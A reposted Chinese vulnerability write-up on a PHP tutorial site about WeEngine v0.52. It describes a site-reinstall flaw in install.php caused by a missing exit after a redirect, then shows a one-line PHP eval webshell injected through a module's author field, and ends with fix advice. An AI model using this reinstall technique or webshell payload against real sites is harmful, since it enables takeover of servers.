网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

微擎-微信公众平台自助引擎系统整站重装+SQL注入

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 微擎-微信公众平台自助引擎系统整站重装+SQL注入getshellhttp: www we7 cc 源码下载,量还是挺大的。验证为v0 52,漏洞应该是版本通杀。http: bbs we7 cc forum php?mod=viewthreadtid=1155在 install php文件...

http://www.we7.cc/源码下载,量还是挺大的。验证为v0.52,漏洞应该是版本通杀。
 



 
 
 
http://bbs.we7.cc/forum.php?mod=viewthread&tid=1155
 
在/install.php文件中26~28行代码如下:
 
if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') {

header('location: ./index.php');

}

 

 
 
如果满足条件,则跳转到index.php,但header并没有阻止程序继续往下执行。通过构造post包,可以实现整站重装。
 
 
http://127.0.0.1/weixin/member.php?act=login&
 
admin/111111进行登录,在全局设置---模块管理---模块设计中添加一个新的模块
 
在作者框内填写一句话木马*/eval($_POST[chopper]);/*,生成模块模板
 
 
webshell地址:
 
http://127.0.0.1/weixin/source/modules/test/module.php
 
修复方案:
1.安装完后自动删除install.php文件,或满足条件处跳转后退出;
 
2.sql注入处正确过滤。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论